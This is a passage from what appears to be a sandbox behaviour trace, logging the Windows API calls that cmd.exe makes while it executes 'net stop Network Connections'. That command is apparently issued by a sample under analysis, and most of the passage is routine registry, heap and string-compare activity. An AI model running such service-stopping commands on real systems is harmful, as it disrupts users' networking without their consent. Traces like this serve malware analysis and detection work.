"\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 218 os_tid = 0x1310 [0297.127] GetModuleHandleA (lpModuleName=0x0) returned 0xd00000 [0297.127] __set_app_type (_Type=0x1) [0297.127] __p__fmode () returned 0x74ac4d6c [0297.127] __p__commode () returned 0x74ac5b1c [0297.127] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xd15200) returned 0x0 [0297.127] __getmainargs (in: _Argc=0xd260e8, _Argv=0xd260ec, _Env=0xd260f0, _DoWildCard=0, _StartInfo=0xd260fc | out: _Argc=0xd260e8, _Argv=0xd260ec, _Env=0xd260f0) returned 0 [0297.128] GetCurrentThreadId () returned 0x1310 [0297.128] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x1310) returned 0x84 [0297.128] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f30000 [0297.128] GetProcAddress (hModule=0x74f30000, lpProcName="SetThreadUILanguage") returned 0x74f72510 [0297.128] SetThreadUILanguage (LangId=0x0) returned 0x409 [0297.136] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0297.136] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ff18 | out: phkResult=0x19ff18*=0x0) returned 0x2 [0297.136] VirtualQuery (in: lpAddress=0x19ff1f, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x19f000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0297.136] VirtualQuery (in: lpAddress=0xa0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa0000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0297.136] VirtualQuery (in: lpAddress=0xa1000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa1000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0297.137] VirtualQuery (in: lpAddress=0xa3000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa3000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0297.137] VirtualQuery (in: lpAddress=0x1a0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x1a0000, AllocationBase=0x1a0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0297.137] GetConsoleOutputCP () returned 0x1b5 [0297.173] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xd2f460 | out: lpCPInfo=0xd2f460) returned 1 [0297.173] SetConsoleCtrlHandler (HandlerRoutine=0xd20e40, Add=1) returned 1 [0297.173] _get_osfhandle (_FileHandle=1) returned 0x3c [0297.174] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0297.179] _get_osfhandle (_FileHandle=1) returned 0x3c [0297.179] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xd2f40c | out: lpMode=0xd2f40c) returned 1 [0297.189] _get_osfhandle (_FileHandle=1) returned 0x3c [0297.189] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x7) returned 1 [0297.190] _get_osfhandle (_FileHandle=0) returned 0x38 [0297.190] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0xd2f408 | out: lpMode=0xd2f408) returned 1 [0297.190] _get_osfhandle (_FileHandle=0) returned 0x38 [0297.191] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1a7) returned 1 [0297.191] GetEnvironmentStringsW () returned 0x407cf8* [0297.191] GetProcessHeap () returned 0x400000 [0297.191] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0xa1a) returned 0x408720 [0297.191] FreeEnvironmentStringsA (penv="A") returned 1 [0297.191] GetProcessHeap () returned 0x400000 [0297.191] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x4) returned 0x400550 [0297.192] GetEnvironmentStringsW () returned 0x407cf8* [0297.192] GetProcessHeap () returned 0x400000 [0297.192] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0xa1a) returned 0x409148 [0297.192] FreeEnvironmentStringsA (penv="A") returned 1 [0297.192] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x94) returned 0x0 [0297.192] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x49, lpcbData=0x19ee80*=0x1000) returned 0x2 [0297.192] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0297.192] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0297.192] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0297.192] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0297.192] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0297.192] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0297.193] RegCloseKey (hKey=0x94) returned 0x0 [0297.193] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x94) returned 0x0 [0297.193] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0297.193] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0297.193] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0297.193] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0297.193] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0297.193] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0297.193] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x1000) returned 0x2 [0297.193] RegCloseKey (hKey=0x94) returned 0x0 [0297.193] time (in: timer=0x0 | out: timer=0x0) returned 0x620b7545 [0297.193] srand (_Seed=0x620b7545) [0297.193] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /C net stop Network Connections" [0297.193] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /C net stop Network Connections" [0297.193] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xd37720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0297.194] GetProcessHeap () returned 0x400000 [0297.194] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x210) returned 0x409b70 [0297.194] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x409b78, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0297.194] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xd2f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0297.194] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xd2f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0297.194] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0xd2f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0297.194] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0297.194] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0297.194] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0297.194] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0297.194] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0297.194] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0297.194] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0297.194] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0297.194] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0297.195] GetProcessHeap () returned 0x400000 [0297.195] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x408720) returned 1 [0297.195] GetEnvironmentStringsW () returned 0x407cf8* [0297.195] GetProcessHeap () returned 0x400000 [0297.195] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0xa32) returned 0x40a7c8 [0297.195] FreeEnvironmentStringsA (penv="A") returned 1 [0297.195] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0xd2f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x1b [0297.195] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0xd2f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0297.195] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0297.195] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0297.196] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0297.196] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0297.196] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0297.196] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0297.196] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0297.196] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0297.196] GetProcessHeap () returned 0x400000 [0297.196] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x44) returned 0x4005c8 [0297.196] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x19fc54 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0297.196] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", nBufferLength=0x104, lpBuffer=0x19fc54, lpFilePart=0x19fc4c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19fc4c*="Desktop") returned 0x1d [0297.196] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0297.196] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x3ce179de, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3ce179de, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x400618 [0297.196] FindClose (in: hFindFile=0x400618 | out: hFindFile=0x400618) returned 1 [0297.197] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x84ac775d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84ac775d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RDhJ0CNFevzX", cAlternateFileName="RDHJ0C~1")) returned 0x400618 [0297.197] FindClose (in: hFindFile=0x400618 | out: hFindFile=0x400618) returned 1 [0297.197] _wcsnicmp (_String1="RDHJ0C~1", _String2="RDhJ0CNFevzX", _MaxCount=0xc) returned 16 [0297.197] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xd71272d6, ftLastAccessTime.dwHighDateTime=0x1d8224f, ftLastWriteTime.dwLowDateTime=0xd71272d6, ftLastWriteTime.dwHighDateTime=0x1d8224f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x400618 [0297.197] FindClose (in: hFindFile=0x400618 | out: hFindFile=0x400618) returned 1 [0297.197] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0297.198] SetCurrentDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 1 [0297.198] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 1 [0297.198] GetProcessHeap () returned 0x400000 [0297.198] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x40a7c8) returned 1 [0297.198] GetEnvironmentStringsW () returned 0x407cf8* [0297.198] GetProcessHeap () returned 0x400000 [0297.198] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0xa76) returned 0x409d88 [0297.198] FreeEnvironmentStringsA (penv="=") returned 1 [0297.198] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xd37720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0297.198] GetProcessHeap () returned 0x400000 [0297.198] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x4005c8) returned 1 [0297.199] GetProcessHeap () returned 0x400000 [0297.199] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x400e) returned 0x40bc88 [0297.200] GetProcessHeap () returned 0x400000 [0297.200] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x46) returned 0x40a808 [0297.200] GetProcessHeap () returned 0x400000 [0297.201] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x40bc88) returned 1 [0297.201] GetConsoleOutputCP () returned 0x1b5 [0297.201] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xd2f460 | out: lpCPInfo=0xd2f460) returned 1 [0297.201] GetUserDefaultLCID () returned 0x409 [0297.202] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0xd334a0, cchData=8 | out: lpLCData=":") returned 2 [0297.202] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0297.202] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0297.202] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x19fd84, cchData=128 | out: lpLCData="1") returned 2 [0297.202] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0xd334b0, cchData=8 | out: lpLCData="/") returned 2 [0297.202] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0xd33500, cchData=32 | out: lpLCData="Mon") returned 4 [0297.202] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0xd33540, cchData=32 | out: lpLCData="Tue") returned 4 [0297.202] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0xd33580, cchData=32 | out: lpLCData="Wed") returned 4 [0297.202] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0xd335c0, cchData=32 | out: lpLCData="Thu") returned 4 [0297.202] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0xd33600, cchData=32 | out: lpLCData="Fri") returned 4 [0297.202] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0xd33640, cchData=32 | out: lpLCData="Sat") returned 4 [0297.202] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0xd33680, cchData=32 | out: lpLCData="Sun") returned 4 [0297.202] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0xd334c0, cchData=8 | out: lpLCData=".") returned 2 [0297.202] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0xd334e0, cchData=8 | out: lpLCData=",") returned 2 [0297.202] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0297.204] GetProcessHeap () returned 0x400000 [0297.204] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x20c) returned 0x40a8a0 [0297.204] GetConsoleTitleW (in: lpConsoleTitle=0x40a8a0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0297.204] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f30000 [0297.204] GetProcAddress (hModule=0x74f30000, lpProcName="CopyFileExW") returned 0x74f4ffc0 [0297.204] GetProcAddress (hModule=0x74f30000, lpProcName="IsDebuggerPresent") returned 0x74f4b0b0 [0297.204] GetProcAddress (hModule=0x74f30000, lpProcName="SetConsoleInputExeNameW") returned 0x76beb440 [0297.205] GetProcessHeap () returned 0x400000 [0297.205] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x400a) returned 0x40bc88 [0297.205] GetProcessHeap () returned 0x400000 [0297.205] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x40bc88) returned 1 [0297.206] _wcsicmp (_String1="net", _String2=")") returned 69 [0297.206] _wcsicmp (_String1="FOR", _String2="net") returned -8 [0297.206] _wcsicmp (_String1="FOR/?", _String2="net") returned -8 [0297.206] _wcsicmp (_String1="IF", _String2="net") returned -5 [0297.206] _wcsicmp (_String1="IF/?", _String2="net") returned -5 [0297.206] _wcsicmp (_String1="REM", _String2="net") returned 4 [0297.206] _wcsicmp (_String1="REM/?", _String2="net") returned 4 [0297.206] GetProcessHeap () returned 0x400000 [0297.206] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x58) returned 0x40aab8 [0297.206] GetProcessHeap () returned 0x400000 [0297.206] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x10) returned 0x400578 [0297.207] GetProcessHeap () returned 0x400000 [0297.207] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x3c) returned 0x40ab18 [0297.207] GetConsoleTitleW (in: lpConsoleTitle=0x19fa70, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0297.208] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0297.208] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0297.208] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0297.208] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0297.208] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0297.208] _wcsicmp (_String1="net", _String2="CD") returned 11 [0297.208] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0297.208] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0297.208] _wcsicmp (_String1="net", _String2="REN") returned -4 [0297.208] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0297.209] _wcsicmp (_String1="net", _String2="SET") returned -5 [0297.209] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0297.209] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0297.209] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0297.209] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0297.209] _wcsicmp (_String1="net", _String2="MD") returned 1 [0297.209] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0297.209] _wcsicmp (_String1="net", _String2="RD") returned -4 [0297.209] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0297.209] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0297.209] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0297.209] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0297.209] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0297.209] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0297.209] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0297.209] _wcsicmp (_String1="net", _String2="VER") returned -8 [0297.209] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0297.209] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0297.209] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0297.209] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0297.209] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0297.209] _wcsicmp (_String1="net", _String2="START") returned -5 [0297.209] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0297.210] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0297.210] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0297.210] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0297.210] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0297.210] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0297.210] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0297.210] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0297.210] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0297.210] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0297.210] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0297.210] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0297.210] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0297.210] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0297.210] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0297.210] _wcsicmp (_String1="net", _String2="CD") returned 11 [0297.210] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0297.210] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0297.210] _wcsicmp (_String1="net", _String2="REN") returned -4 [0297.210] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0297.210] _wcsicmp (_String1="net", _String2="SET") returned -5 [0297.210] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0297.210] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0297.210] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0297.210] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0297.211] _wcsicmp (_String1="net", _String2="MD") returned 1 [0297.211] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0297.211] _wcsicmp (_String1="net", _String2="RD") returned -4 [0297.211] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0297.211] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0297.211] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0297.211] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0297.211] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0297.211] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0297.211] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0297.211] _wcsicmp (_String1="net", _String2="VER") returned -8 [0297.211] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0297.211] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0297.211] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0297.211] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0297.211] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0297.211] _wcsicmp (_String1="net", _String2="START") returned -5 [0297.211] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0297.211] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0297.211] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0297.211] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0297.211] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0297.211] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0297.211] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0297.212] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0297.212] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0297.212] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0297.212] _wcsicmp (_String1="net", _String2="FOR") returned 8 [0297.212] _wcsicmp (_String1="net", _String2="IF") returned 5 [0297.212] _wcsicmp (_String1="net", _String2="REM") returned -4 [0297.212] GetProcessHeap () returned 0x400000 [0297.212] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x210) returned 0x40ab60 [0297.212] GetProcessHeap () returned 0x400000 [0297.212] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x44) returned 0x40ad78 [0297.212] _wcsnicmp (_String1="net", _String2="cmd ", _MaxCount=0x4) returned 11 [0297.212] GetProcessHeap () returned 0x400000 [0297.212] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x418) returned 0x40adc8 [0297.212] SetErrorMode (uMode=0x0) returned 0x0 [0297.213] SetErrorMode (uMode=0x1) returned 0x0 [0297.213] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x40add0, lpFilePart=0x19f57c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19f57c*="Desktop") returned 0x1d [0297.213] SetErrorMode (uMode=0x0) returned 0x1 [0297.213] GetProcessHeap () returned 0x400000 [0297.213] RtlReAllocateHeap (Heap=0x400000, Flags=0x0, Ptr=0x40adc8, Size=0x4c) returned 0x40adc8 [0297.213] GetProcessHeap () returned 0x400000 [0297.213] RtlSizeHeap (HeapHandle=0x400000, Flags=0x0, MemoryPointer=0x40adc8) returned 0x4c [0297.213] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xd2f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0297.213] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0297.213] GetProcessHeap () returned 0x400000 [0297.213] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x110) returned 0x40ae20 [0297.213] GetProcessHeap () returned 0x400000 [0297.213] RtlAllocateHeap 